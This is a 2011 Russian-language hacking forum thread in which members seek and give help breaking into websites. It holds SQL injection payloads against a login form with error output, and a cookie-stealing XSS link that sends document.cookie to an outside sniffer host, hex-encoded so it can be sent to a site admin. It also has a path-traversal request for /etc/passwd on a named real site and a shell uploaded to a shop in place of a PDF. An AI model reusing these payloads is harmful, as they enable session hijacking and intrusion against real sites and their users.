Ваши вопросы по уязвимостям.

Melfis · 12 Aug 2011

stasiliy said:

Подскажите плз, ISP manager Пароли к админке держит в БАЗЕ?
спасибо
Click to expand...

Нет - если ты про бд.

YuNi|[c · 12 Aug 2011

прошу помочь с скулем не могу раскрутит
Code:
https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')
Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')
Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')
тока email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x норм отображается но order by не катет

ridik77 · 12 Aug 2011

подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт "><script>alert(/xss/)</script> дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\"><script>al ert(/xss/)</script> подскажите что дальше?

Gusev · 12 Aug 2011

Кто то работал с сайтами ucoz (сейчас есть уязвимость по превод пользователей с категории в категорию) - много шума это поднимает сейчас

( у кого то скрипты есть )

winstrool · 12 Aug 2011

ridik77 said:

подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт "><script>alert(/xss/)</script> дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\"><script>al ert(/xss/)</script> подскажите что дальше?
Click to expand...

Это дело называется пасивная XSS, ты можешь поставить где нить снифер, и подсунуть ссылку админу
ххх.com/?a=login&say=invalid_login&username=\\"><script>document.location="SNIFFER"+document.cookie</script> за счет чего получишь админские куки и если повезет сможешь под его куками войти в админку

ZARO · 12 Aug 2011

YuNi|[c said:
прошу помочь с скулем не могу раскрутит
Code:
https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')
Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')
Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')
тока email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x норм отображается но order by не катет
Click to expand...
Code:
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x
Так попробуй (только не забудь удалить пробелы, которые форум подставляет)

YuNi|[c · 12 Aug 2011

ZARO said:
Code:
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x
Так попробуй (только не забудь удалить пробелы, которые форум подставляет)
Click to expand...
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x' AND (c.password is not null AND c.password != '')

спс не подходит чет стукнул в пм

ridik77 · 12 Aug 2011

winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт- <script>
img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
</script> и есть ява скрипт для адресной строки- javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;</script>')
куда и как подставлять? куки должны сразу прейти или надо ждать?

Expl0ited · 12 Aug 2011

YuNi|[c, во первых - раз у тебя данные передаются _POST методом, то символ плюс (+) использовать не нужно, т.к. это аналог пробела, и в твоем случае этот символ попадает так как есть.
во-вторых в конце обязательно нужен комментарий, в качестве которого достаточно использовать символ решетки (#)
в-третьих попробуй так:
Code:
[email protected]&signinfrom=private&password=x'or(select(max(1))from(customer)group by(concat(version(),0x00,floor(rand(0)*2))))#

herfleisch · 12 Aug 2011

Пытаюсь эксплуатировать Stack Overflow в обычном strcpy(). Успешно переписал адрес возврата из функции, но перед возвратом вызывается проверка:
Code:
call __security_check_cookie
Есть ли способы её обойти?

Windows XP

winstrool · 12 Aug 2011

ridik77 said:

winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт- <script>
img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
</script> и есть ява скрипт для адресной строки- javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;</script>')
куда и как подставлять? куки должны сразу прейти или надо ждать?
Click to expand...

в твоем случае в адресную строку следовательно и скрипт нужно для адресной строки, такжже чтоб сильно глаза не резало, переведи в хекс, прийдется подождать пока админ перейдет по ссылке...

P/S:вот подготовил код твоего снифака тебе остается подставить только название сайта:

ххх.com/?a=login&say=invalid_login&username=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%68%74%74%70%7a%2e%72%75%2f%6e%79%70%62%69%34%75%38%30%66%35%2e%67%69%66%3f%22%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Click to expand...

ridik77 · 12 Aug 2011

winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?

randman · 12 Aug 2011

ridik77 said:

winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
Click to expand...

Куки это. Обратись к стандартному мануалу по использованию XSS:
http://ha.ckers.org/xss.html
https://forum.antichat.ru/showthread.php?t=42326
https://forum.antichat.ru/thread20140.html

GroM88 · 12 Aug 2011

Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?

Koren · 12 Aug 2011

http://www.multiplaz.ru/download//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
от этого можно получить что то большее? чем раскрытие путей

Expl0ited · 12 Aug 2011

GroM88 said:

Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?
Click to expand...

Скорее всего в базе

Faaax · 12 Aug 2011

погомогите плз!
собственно нашёл blind,но не могу раскрутить!
Code:
http://elecsnet.ru/search/?rid=23359

Melfis · 12 Aug 2011

Faaax said:
погомогите плз!
собственно нашёл blind,но не могу раскрутить!
Code:
http://elecsnet.ru/search/?rid=23359
Click to expand...
в каком месте тут скуль?

PATCH · 13 Aug 2011

Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору

mysql_query ("SELECT * FROM user WHERE id='$id'");
$id = числу но можно подставить следующие при должно проверки
$id= 10 OR nick=ADMIN и запрос будет типа

mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");

в вожу в адресной строке следующее
http://site.ru/user.php?id=10 or nick=ADMIN

почему не срабатывает? обработки id нету ибо я сам писал запрос

Konqi · 13 Aug 2011

PATCH said:

Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору

mysql_query ("SELECT * FROM user WHERE id='$id'");
$id = числу но можно подставить следующие при должно проверки
$id= 10 OR nick=ADMIN и запрос будет типа

mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");

в вожу в адресной строке следующее
http://site.ru/user.php?id=10 or nick=ADMIN

почему не срабатывает? обработки id нету ибо я сам писал запрос
Click to expand...

у тебя в запросе ID передается как string (оно в ковычках), чтобы попасть в тело запроса, нужно сначало выйти за предела id, получится id='10' or nick='ADMIN'

данный тип иньекции требует отключенный magic quotes

Ваши вопросы по уязвимостям.

Melfis Elder - Старейшина

YuNi|[c Elder - Старейшина

ridik77 New Member

Gusev Banned

winstrool MasterBlind

ZARO Elder - Старейшина

YuNi|[c Elder - Старейшина

ridik77 New Member

Expl0ited Members of Antichat

herfleisch Elder - Старейшина

winstrool MasterBlind

ridik77 New Member

randman Members of Antichat

GroM88 Elder - Старейшина

Koren Member

Expl0ited Members of Antichat

Faaax Banned

Melfis Elder - Старейшина

PATCH Member

Konqi Green member

Useful Searches

Ваши вопросы по уязвимостям.

Melfis Elder - Старейшина

YuNi|[c Elder - Старейшина

ridik77 New Member

Gusev Banned

winstrool ~~*MasterBlind*~~

ZARO Elder - Старейшина

YuNi|[c Elder - Старейшина

ridik77 New Member

Expl0ited Members of Antichat

herfleisch Elder - Старейшина

winstrool ~~*MasterBlind*~~

ridik77 New Member

randman Members of Antichat

GroM88 Elder - Старейшина

Koren Member

Expl0ited Members of Antichat

Faaax Banned

Melfis Elder - Старейшина

PATCH Member

Konqi Green member

winstrool MasterBlind

winstrool MasterBlind